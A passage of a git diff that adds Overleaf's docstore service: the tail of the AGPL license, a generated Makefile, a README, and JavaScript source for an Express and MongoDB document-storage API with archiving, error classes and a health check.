pursuant to the +following paragraph. + + Notwithstanding any other provision of this License, you have +permission to link or combine any covered work with a work licensed +under version 3 of the GNU General Public License into a single +combined work, and to convey the resulting work. The terms of this +License will continue to apply to the part which is the covered work, +but the work with which it is combined will remain governed by version +3 of the GNU General Public License. + + 14. Revised Versions of this License. + + The Free Software Foundation may publish revised and/or new versions of +the GNU Affero General Public License from time to time. Such new versions +will be similar in spirit to the present version, but may differ in detail to +address new problems or concerns. + + Each version is given a distinguishing version number. If the +Program specifies that a certain numbered version of the GNU Affero General +Public License "or any later version" applies to it, you have the +option of following the terms and conditions either of that numbered +version or of any later version published by the Free Software +Foundation. If the Program does not specify a version number of the +GNU Affero General Public License, you may choose any version ever published +by the Free Software Foundation. + + If the Program specifies that a proxy can decide which future +versions of the GNU Affero General Public License can be used, that proxy's +public statement of acceptance of a version permanently authorizes you +to choose that version for the Program. + + Later license versions may give you additional or different +permissions. However, no additional obligations are imposed on any +author or copyright holder as a result of your choosing to follow a +later version. + + 15. Disclaimer of Warranty. + + THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY +APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT +HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY +OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM +IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF +ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + + 16. Limitation of Liability. + + IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING +WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS +THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY +GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE +USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF +DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD +PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), +EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF +SUCH DAMAGES. + + 17. Interpretation of Sections 15 and 16. + + If the disclaimer of warranty and limitation of liability provided +above cannot be given local legal effect according to their terms, +reviewing courts shall apply local law that most closely approximates +an absolute waiver of all civil liability in connection with the +Program, unless a warranty or assumption of liability accompanies a +copy of the Program in return for a fee. + + END OF TERMS AND CONDITIONS + + How to Apply These Terms to Your New Programs + + If you develop a new program, and you want it to be of the greatest +possible use to the public, the best way to achieve this is to make it +free software which everyone can redistribute and change under these terms. + + To do so, attach the following notices to the program. It is safest +to attach them to the start of each source file to most effectively +state the exclusion of warranty; and each file should have at least +the "copyright" line and a pointer to where the full notice is found. + + <one line to give the program's name and a brief idea of what it does.> + Copyright (C) <year> <name of author> + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU Affero General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU Affero General Public License for more details. + + You should have received a copy of the GNU Affero General Public License + along with this program. If not, see <http://www.gnu.org/licenses/>. + +Also add information on how to contact you by electronic and paper mail. + + If your software can interact with users remotely through a computer +network, you should also make sure that it provides a way for users to +get its source. For example, if your program is a web application, its +interface could display a "Source" link that leads users to an archive +of the code. There are many ways you could offer source, and different +solutions will be better for different programs; see section 13 for the +specific requirements. + + You should also get your employer (if you work as a programmer) or school, +if any, to sign a "copyright disclaimer" for the program, if necessary. +For more information on this, and how to apply and follow the GNU AGPL, see +<http://www.gnu.org/licenses/>. diff --git a/services/docstore/Makefile b/services/docstore/Makefile new file mode 100644 index 0000000..6efd053 --- /dev/null +++ b/services/docstore/Makefile @@ -0,0 +1,156 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +BUILD_NUMBER ?= local +BRANCH_NAME ?= $(shell git rev-parse --abbrev-ref HEAD) +PROJECT_NAME = docstore +BUILD_DIR_NAME = $(shell pwd | xargs basename | tr -cd '[a-zA-Z0-9_.\-]') + +DOCKER_COMPOSE_FLAGS ?= -f docker-compose.yml +DOCKER_COMPOSE := BUILD_NUMBER=$(BUILD_NUMBER) \ + BRANCH_NAME=$(BRANCH_NAME) \ + PROJECT_NAME=$(PROJECT_NAME) \ + MOCHA_GREP=${MOCHA_GREP} \ + docker compose ${DOCKER_COMPOSE_FLAGS} + +COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE ?= test_acceptance_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_ACCEPTANCE = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_ACCEPTANCE) $(DOCKER_COMPOSE) + +COMPOSE_PROJECT_NAME_TEST_UNIT ?= test_unit_$(BUILD_DIR_NAME) +DOCKER_COMPOSE_TEST_UNIT = \ + COMPOSE_PROJECT_NAME=$(COMPOSE_PROJECT_NAME_TEST_UNIT) $(DOCKER_COMPOSE) + +clean: + -docker rmi ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -docker rmi us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + -$(DOCKER_COMPOSE_TEST_UNIT) down --rmi local + -$(DOCKER_COMPOSE_TEST_ACCEPTANCE) down --rmi local + +HERE=$(shell pwd) +MONOREPO=$(shell cd ../../ && pwd) +# Run the linting commands in the scope of the monorepo. +# Eslint and prettier (plus some configs) are on the root. +RUN_LINTING = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(HERE) node:20.18.2 npm run --silent + +RUN_LINTING_CI = docker run --rm --volume $(MONOREPO)/.editorconfig:/overleaf/.editorconfig --volume $(MONOREPO)/.eslintignore:/overleaf/.eslintignore --volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. + +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/docstore/README.md b/services/docstore/README.md new file mode 100644 index 0000000..09b27ac --- /dev/null +++ b/services/docstore/README.md @@ -0,0 +1,11 @@ +overleaf/docstore +=================== + +A CRUD API for storing and updating text documents in projects + +License +------- + +The code in this repository is released under the GNU AFFERO GENERAL PUBLIC LICENSE, version 3. A copy can be found in the `LICENSE` file. + +Copyright (c) Overleaf, 2014-2019. diff --git a/services/docstore/app.js b/services/docstore/app.js new file mode 100644 index 0000000..76659e8 --- /dev/null +++ b/services/docstore/app.js @@ -0,0 +1,132 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Events = require('node:events') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const express = require('express') +const bodyParser = require('body-parser') +const { + celebrate: validate, + Joi, + errors: handleValidationErrors, +} = require('celebrate') +const { mongoClient } = require('./app/js/mongodb') +const Errors = require('./app/js/Errors') +const HttpController = require('./app/js/HttpController') + +Events.setMaxListeners(20) + +logger.initialize('docstore') +if (Metrics.event_loop != null) { + Metrics.event_loop.monitor(logger) +} +Metrics.leaked_sockets.monitor(logger) +Metrics.open_sockets.monitor() + +const app = express() + +app.use(Metrics.http.monitor(logger)) + +Metrics.injectMetricsRoute(app) + +app.param('project_id', function (req, res, next, projectId) { + if (projectId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid project id')) + } +}) + +app.param('doc_id', function (req, res, next, docId) { + if (docId?.match(/^[0-9a-f]{24}$/)) { + next() + } else { + next(new Error('invalid doc id')) + } +}) + +app.get('/project/:project_id/doc-deleted', HttpController.getAllDeletedDocs) +app.get('/project/:project_id/doc', HttpController.getAllDocs) +app.get('/project/:project_id/ranges', HttpController.getAllRanges) +app.get('/project/:project_id/has-ranges', HttpController.projectHasRanges) +app.get('/project/:project_id/doc/:doc_id', HttpController.getDoc) +app.get('/project/:project_id/doc/:doc_id/deleted', HttpController.isDocDeleted) +app.get('/project/:project_id/doc/:doc_id/raw', HttpController.getRawDoc) +app.get('/project/:project_id/doc/:doc_id/peek', HttpController.peekDoc) +// Add 64kb overhead for the JSON encoding, and double the size to allow for ranges in the json payload +app.post( + '/project/:project_id/doc/:doc_id', + bodyParser.json({ limit: Settings.maxJsonRequestSize }), + HttpController.updateDoc +) +app.patch( + '/project/:project_id/doc/:doc_id', + bodyParser.json(), + validate({ + body: { + deleted: Joi.boolean(), + name: Joi.string().when('deleted', { is: true, then: Joi.required() }), + deletedAt: Joi.date().when('deleted', { is: true, then: Joi.required() }), + }, + }), + HttpController.patchDoc +) +app.delete('/project/:project_id/doc/:doc_id', (req, res) => { + res.status(500).send('DELETE-ing a doc is DEPRECATED. PATCH the doc instead.') +}) + +app.post('/project/:project_id/archive', HttpController.archiveAllDocs) +app.post('/project/:project_id/doc/:doc_id/archive', HttpController.archiveDoc) +app.post('/project/:project_id/unarchive', HttpController.unArchiveAllDocs) +app.post('/project/:project_id/destroy', HttpController.destroyProject) + +app.get('/health_check', HttpController.healthCheck) + +app.get('/status', (req, res) => res.send('docstore is alive')) + +app.use(handleValidationErrors()) +app.use(function (error, req, res, next) { + if (error instanceof Errors.NotFoundError) { + logger.warn({ req }, 'not found') + res.sendStatus(404) + } else if (error instanceof Errors.DocModifiedError) { + logger.warn({ req }, 'conflict: doc modified') + res.sendStatus(409) + } else if (error instanceof Errors.DocVersionDecrementedError) { + logger.warn({ req }, 'conflict: doc version decremented') + res.sendStatus(409) + } else { + logger.error({ err: error, req }, 'request errored') + res.status(500).send('Oops, something went wrong') + } +}) + +const { port } = Settings.internal.docstore +const { host } = Settings.internal.docstore + +if (!module.parent) { + // Called directly + mongoClient + .connect() + .then(() => { + const server = app.listen(port, host, function (err) { + if (err) { + logger.fatal({ err }, `Cannot bind to ${host}:${port}. Exiting.`) + process.exit(1) + } + logger.debug(`Docstore starting up, listening on ${host}:${port}`) + }) + server.timeout = 120000 + server.keepAliveTimeout = 5000 + server.requestTimeout = 60000 + server.headersTimeout = 60000 + }) + .catch(err => { + logger.fatal({ err }, 'Cannot connect to mongo. Exiting.') + process.exit(1) + }) +} + +module.exports = app diff --git a/services/docstore/app/js/DocArchiveManager.js b/services/docstore/app/js/DocArchiveManager.js new file mode 100644 index 0000000..4390afe --- /dev/null +++ b/services/docstore/app/js/DocArchiveManager.js @@ -0,0 +1,227 @@ +const { callbackify } = require('node:util') +const MongoManager = require('./MongoManager').promises +const Errors = require('./Errors') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const crypto = require('node:crypto') +const { ReadableString } = require('@overleaf/stream-utils') +const RangeManager = require('./RangeManager') +const PersistorManager = require('./PersistorManager') +const pMap = require('p-map') +const { streamToBuffer } = require('./StreamToBuffer').promises +const { BSON } = require('mongodb-legacy') + +const PARALLEL_JOBS = Settings.parallelArchiveJobs +const UN_ARCHIVE_BATCH_SIZE = Settings.unArchiveBatchSize + +module.exports = { + archiveAllDocs: callbackify(archiveAllDocs), + archiveDoc: callbackify(archiveDoc), + unArchiveAllDocs: callbackify(unArchiveAllDocs), + unarchiveDoc: callbackify(unarchiveDoc), + destroyProject: callbackify(destroyProject), + getDoc: callbackify(getDoc), + promises: { + archiveAllDocs, + archiveDoc, + unArchiveAllDocs, + unarchiveDoc, + destroyProject, + getDoc, + }, +} + +async function archiveAllDocs(projectId) { + if (!_isArchivingEnabled()) { + return + } + + const docIds = await MongoManager.getNonArchivedProjectDocIds(projectId) + await pMap(docIds, docId => archiveDoc(projectId, docId), { + concurrency: PARALLEL_JOBS, + }) +} + +async function archiveDoc(projectId, docId) { + if (!_isArchivingEnabled()) { + return + } + + const doc = await MongoManager.getDocForArchiving(projectId, docId) + + if (!doc) { + // The doc wasn't found, it was already archived, or the lock couldn't be + // acquired. Since we don't know which it is, silently return. + return + } + + logger.debug({ projectId, docId: doc._id }, 'sending doc to persistor') + const key = `${projectId}/${doc._id}` + + if (doc.lines == null) { + throw new Error('doc has no lines') + } + + // warn about any oversized docs already in mongo + const linesSize = BSON.calculateObjectSize(doc.lines || {}) + const rangesSize = BSON.calculateObjectSize(doc.ranges || {}) + if ( + linesSize > Settings.max_doc_length || + rangesSize > Settings.max_doc_length + ) { + logger.warn( + { projectId, docId: doc._id, linesSize, rangesSize }, + 'large doc found when archiving project' + ) + } + + const json = JSON.stringify({ + lines: doc.lines, + ranges: doc.ranges, + rev: doc.rev, + schema_v: 1, + }) + + // this should never happen, but protects against memory-corruption errors that + // have happened in the past + if (json.indexOf('\u0000') > -1) { + const error = new Error('null bytes detected') + logger.err({ err: error, doc }, error.message) + throw error + } + + const md5 = crypto.createHash('md5').update(json).digest('hex') + const stream = new ReadableString(json) + await PersistorManager.sendStream(Settings.docstore.bucket, key, stream, { + sourceMd5: md5, + }) + await MongoManager.markDocAsArchived(projectId, docId, doc.rev) +} + +async function unArchiveAllDocs(projectId) { + if (!_isArchivingEnabled()) { + return + } + + while (true) { + let docs + if (Settings.docstore.keepSoftDeletedDocsArchived) { + docs = await MongoManager.getNonDeletedArchivedProjectDocs( + projectId, + UN_ARCHIVE_BATCH_SIZE + ) + } else { + docs = await MongoManager.getArchivedProjectDocs( + projectId, + UN_ARCHIVE_BATCH_SIZE + ) + } + if (!docs || docs.length === 0) { + break + } + await pMap(docs, doc => unarchiveDoc(projectId, doc._id), { + concurrency: PARALLEL_JOBS, + }) + } +} + +// get the doc from the PersistorManager without storing it in mongo +async function getDoc(projectId, docId) { + const key = `${projectId}/${docId}` + const sourceMd5 = await PersistorManager.getObjectMd5Hash( + Settings.docstore.bucket, + key + ) + const stream = await PersistorManager.getObjectStream( + Settings.docstore.bucket, + key + ) + stream.resume() + const buffer = await streamToBuffer(projectId, docId, stream) + const md5 = crypto.createHash('md5').update(buffer).digest('hex') + if (sourceMd5 !== md5) { + throw new Errors.Md5MismatchError('md5 mismatch when downloading doc', { + key, + sourceMd5, + md5, + }) + } + + return _deserializeArchivedDoc(buffer) +} + +// get the doc and unarchive it to mongo +async function unarchiveDoc(projectId, docId) { + logger.debug({ projectId, docId }, 'getting doc from persistor') + const mongoDoc = await MongoManager.findDoc(projectId, docId, { + inS3: 1, + rev: 1, + }) + if (!mongoDoc.inS3) { + // The doc is already unarchived + return + } + + if (!_isArchivingEnabled()) { + throw new Error( + 'found archived doc, but archiving backend is not configured' + ) + } + + const archivedDoc = await getDoc(projectId, docId) + if (archivedDoc.rev == null) { + // Older archived docs didn't have a rev. Assume that the rev of the + // archived doc is the rev that was stored in Mongo when we retrieved it + // earlier. + archivedDoc.rev = mongoDoc.rev + } + await MongoManager.restoreArchivedDoc(projectId, docId, archivedDoc) +} + +async function destroyProject(projectId) { + const tasks = [MongoManager.destroyProject(projectId)] + if (_isArchivingEnabled()) { + tasks.push( + PersistorManager.deleteDirectory(Settings.docstore.bucket, projectId) + ) + } + await Promise.all(tasks) +} + +function _deserializeArchivedDoc(buffer) { + const doc = JSON.parse(buffer) + + const result = {} + if (doc.schema_v === 1 && doc.lines != null) { + result.lines = doc.lines + if (doc.ranges != null) { + result.ranges = RangeManager.jsonRangesToMongo(doc.ranges) + } + } else if (Array.isArray(doc)) { + result.lines = doc + } else { + throw new Error("I don't understand the doc format in s3") + } + + if (doc.rev != null) { + result.rev = doc.rev + } + + return result +} + +function _isArchivingEnabled() { + const backend = Settings.docstore.backend + + if (!backend) { + return false + } + + // The default backend is S3. If another backend is configured or the S3 + // backend itself is correctly configured, then archiving is enabled. + if (backend === 's3' && Settings.docstore.s3 == null) { + return false + } + + return true +} diff --git a/services/docstore/app/js/DocManager.js b/services/docstore/app/js/DocManager.js new file mode 100644 index 0000000..a9ed994 --- /dev/null +++ b/services/docstore/app/js/DocManager.js @@ -0,0 +1,297 @@ +const MongoManager = require('./MongoManager') +const Errors = require('./Errors') +const logger = require('@overleaf/logger') +const _ = require('lodash') +const DocArchive = require('./DocArchiveManager') +const RangeManager = require('./RangeManager') +const Settings = require('@overleaf/settings') +const { callbackifyAll } = require('@overleaf/promise-utils') +const { setTimeout } = require('node:timers/promises') + +/** + * @import { Document } from 'mongodb' + * @import { WithId } from 'mongodb' + */ + +const DocManager = { + /** + * @param {string} projectId + * @param {string} docId + * @param {{inS3: boolean}} filter + * @returns {Promise<WithId<Document>>} + * @private + */ + async _getDoc(projectId, docId, filter) { + if (filter == null) { + filter = {} + } + if (filter.inS3 !== true) { + throw new Error('must include inS3 when getting doc') + } + + const doc = await MongoManager.promises.findDoc(projectId, docId, filter) + + if (doc == null) { + throw new Errors.NotFoundError( + `No such doc: ${docId} in project ${projectId}` + ) + } + + if (doc.inS3) { + await DocArchive.promises.unarchiveDoc(projectId, docId) + return await DocManager._getDoc(projectId, docId, filter) + } + + return doc + }, + + async isDocDeleted(projectId, docId) { + const doc = await MongoManager.promises.findDoc(projectId, docId, { + deleted: true, + }) + + if (!doc) { + throw new Errors.NotFoundError( + `No such project/doc: ${projectId}/${docId}` + ) + } + + // `doc.deleted` is `undefined` for non deleted docs + return Boolean(doc.deleted) + }, + + async getFullDoc(projectId, docId) { + const doc = await DocManager._getDoc(projectId, docId, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + return doc + }, + + // returns the doc without any version information + async _peekRawDoc(projectId, docId) { + const doc = await MongoManager.promises.findDoc(projectId, docId, { + lines: true, + rev: true, + deleted: true, + version: true, + ranges: true, + inS3: true, + }) + + if (doc == null) { + throw new Errors.NotFoundError( + `No such doc: ${docId} in project ${projectId}` + ) + } + + if (doc.inS3) { + // skip the unarchiving to mongo when getting a doc + const archivedDoc = await DocArchive.promises.getDoc(projectId, docId) + Object.assign(doc, archivedDoc) + } + + return doc + }, + + // get the doc from mongo if possible, or from the persistent store otherwise, + // without unarchiving it (avoids unnecessary writes to mongo) + async peekDoc(projectId, docId) { + const doc = await DocManager._peekRawDoc(projectId, docId) + await MongoManager.promises.checkRevUnchanged(doc) + return doc + }, + + async getDocLines(projectId, docId) { + const doc = await DocManager._getDoc(projectId, docId, { + lines: true, + inS3: true, + }) + return doc + }, + + async getAllDeletedDocs(projectId, filter) { + return await MongoManager.promises.getProjectsDeletedDocs(projectId, filter) + }, + + async getAllNonDeletedDocs(projectId, filter) { + await DocArchive.promises.unArchiveAllDocs(projectId) + const docs = await MongoManager.promises.getProjectsDocs( + projectId, + { include_deleted: false }, + filter + ) + if (docs == null) { + throw new Errors.NotFoundError(`No docs for project ${projectId}`) + } + return docs + }, + + async projectHasRanges(projectId) { + const docs = await MongoManager.promises.getProjectsDocs( + projectId, + {}, + { _id: 1 } + ) + const docIds = docs.map(doc => doc._id) + for (const docId of docIds) { + const doc = await DocManager.peekDoc(projectId, docId) + if ( + (doc.ranges?.comments != null && doc.ranges.comments.length > 0) || + (doc.ranges?.changes != null && doc.ranges.changes.length > 0) + ) { + return true + } + } + return false + }, + + async updateDoc(projectId, docId, lines, version, ranges) { + const MAX_ATTEMPTS = 2 + for (let attempt = 1; attempt <= MAX_ATTEMPTS; attempt++) { + try { + const { modified, rev } = await DocManager._tryUpdateDoc( + projectId, + docId, + lines, + version, + ranges + ) + return { modified, rev } + } catch (err) { + if (err instanceof Errors.DocRevValueError && attempt < MAX_ATTEMPTS) { + // Another updateDoc call was racing with ours. + // Retry once in a bit. + logger.warn( + { projectId, docId, err }, + 'detected concurrent updateDoc call' + ) + await setTimeout(100 + Math.random() * 100) + continue + } else { + throw err + } + } + } + }, + + async _tryUpdateDoc(projectId, docId, lines, version, ranges) { + if (lines == null || version == null || ranges == null) { + throw new Error('no lines, version or ranges provided') + } + + let doc + try { + doc = await DocManager._getDoc(projectId, docId, { + version: true, + rev: true, + lines: true, + ranges: true, + inS3: true, + }) + } catch (err) { + if (err instanceof Errors.NotFoundError) { + doc = null + } else { + throw err + } + } + + ranges = RangeManager.jsonRangesToMongo(ranges) + + let updateLines, updateRanges, updateVersion + if (doc == null) { + // If the document doesn't exist, we'll make sure to create/update all parts of it. + updateLines = true + updateVersion = true + updateRanges = true + } else { + if (doc.version > version) { + // Reject update when the version was decremented. + // Potential reasons: racing flush, broken history. + throw new Errors.DocVersionDecrementedError('rejecting stale update', { + updateVersion: version, + flushedVersion: doc.version, + }) + } + updateLines = !_.isEqual(doc.lines, lines) + updateVersion = doc.version !== version + updateRanges = RangeManager.shouldUpdateRanges(doc.ranges, ranges) + } + + let modified = false + let rev = doc?.rev || 0 + + if (updateLines || updateRanges || updateVersion) { + const update = {} + if (updateLines) { + update.lines = lines + } + if (updateRanges) { + update.ranges = ranges + } + if (updateVersion) { + update.version = version + } + logger.debug( + { projectId, docId, oldVersion: doc?.version, newVersion: version }, + 'updating doc' + ) + + if (updateLines || updateRanges) { + rev += 1 // rev will be incremented in mongo by MongoManager.upsertIntoDocCollection + } + + modified = true + await MongoManager.promises.upsertIntoDocCollection( + projectId, + docId, + doc?.rev, + update + ) + } else { + logger.debug({ projectId, docId }, 'doc has not changed - not updating') + } + + return { modified, rev } + }, + + async patchDoc(projectId, docId, meta) { + const projection = { _id: 1, deleted: true } + const doc = await MongoManager.promises.findDoc( + projectId, + docId, + projection + ) + if (!doc) { + throw new Errors.NotFoundError( + `No such project/doc to delete: ${projectId}/${docId}` + ) + } + + if (meta.deleted && Settings.docstore.archiveOnSoftDelete) { + // The user will not read this doc anytime soon. Flush it out of mongo. + DocArchive.promises.archiveDoc(projectId, docId).catch(err => { + logger.warn( + { projectId, docId, err }, + 'archiving a single doc in the background failed' + ) + }) + } + + await MongoManager.promises.patchDoc(projectId, docId, meta) + }, +} + +module.exports = { + ...callbackifyAll(DocManager, { + multiResult: { + updateDoc: ['modified', 'rev'], + }, + }), + promises: DocManager, +} diff --git a/services/docstore/app/js/Errors.js b/services/docstore/app/js/Errors.js new file mode 100644 index 0000000..bbdbe75 --- /dev/null +++ b/services/docstore/app/js/Errors.js @@ -0,0 +1,19 @@ +// import Errors from object-persistor to pass instanceof checks +const OError = require('@overleaf/o-error') +const { Errors } = require('@overleaf/object-persistor') + +class Md5MismatchError extends OError {} + +class DocModifiedError extends OError {} + +class DocRevValueError extends OError {} + +class DocVersionDecrementedError extends OError {} + +module.exports = { + Md5MismatchError, + DocModifiedError, + DocRevValueError, + DocVersionDecrementedError, + ...Errors, +} diff --git a/services/docstore/app/js/HealthChecker.js b/services/docstore/app/js/HealthChecker.js new file mode 100644 index 0000000..34cd5c9 --- /dev/null +++ b/services/docstore/app/js/HealthChecker.js @@ -0,0 +1,67 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const { db, ObjectId } = require('./mongodb') +const request = require('request') +const async = require('async') +const _ = require('lodash') +const crypto = require('node:crypto') +const settings = require('@overleaf/settings') +const { port } = settings.internal.docstore +const logger = require('@overleaf/logger') + +module.exports = { + check(callback) { + const docId = new ObjectId() + const projectId = new ObjectId(settings.docstore.healthCheck.project_id) + const url = `http://127.0.0.1:${port}/project/${projectId}/doc/${docId}` + const lines = [ + 'smoke test - delete me', + `${crypto.randomBytes(32).toString('hex')}`, + ] + const getOpts = () => ({ + url, + timeout: 3000, + }) + logger.debug({ lines, url, docId, projectId }, 'running health check') + const jobs = [ + function (cb) { + const opts = getOpts() + opts.json = { lines, version: 42, ranges: {} } + return request.post(opts, cb) + }, + function (cb) { + const opts = getOpts() + opts.json = true + return request.get(opts, function (err, res, body) { + if (err != null) { + logger.err({ err }, 'docstore returned a error in health check get') + return cb(err) + } else if (res == null) { + return cb(new Error('no response from docstore with get check')) + } else if ((res != null ? res.statusCode : undefined) !== 200) { + return cb(new Error(`status code not 200, its ${res.statusCode}`)) + } else if ( + _.isEqual(body != null ? body.lines : undefined, lines) && + (body != null ? body._id : undefined) === docId.toString() + ) { + return cb() + } else { + return cb( + new Error( + `health check lines not equal ${body.lines} != ${lines}` + ) + ) + } + }) + }, + cb => db.docs.deleteOne({ _id: docId, project_id: projectId }, cb), + ] + return async.series(jobs, callback) + }, +} diff --git a/services/docstore/app/js/HttpController.js b/services/docstore/app/js/HttpController.js new file mode 100644 index 0000000..1c4e137 --- /dev/null +++ b/services/docstore/app/js/HttpController.js @@ -0,0 +1,319 @@ +const DocManager = require('./DocManager') +const logger = require('@overleaf/logger') +const DocArchive = require('./DocArchiveManager') +const HealthChecker = require('./HealthChecker') +const Errors = require('./Errors') +const Settings = require('@overleaf/settings') + +function getDoc(req, res, next) { + const { doc_id: docId, project_id: projectId } = req.params + const includeDeleted = req.query.include_deleted === 'true' + logger.debug({ projectId, docId }, 'getting doc') + DocManager.getFullDoc(projectId, docId, function (error, doc) { + if (error) { + return next(error) + } + logger.debug({ docId, projectId }, 'got doc') 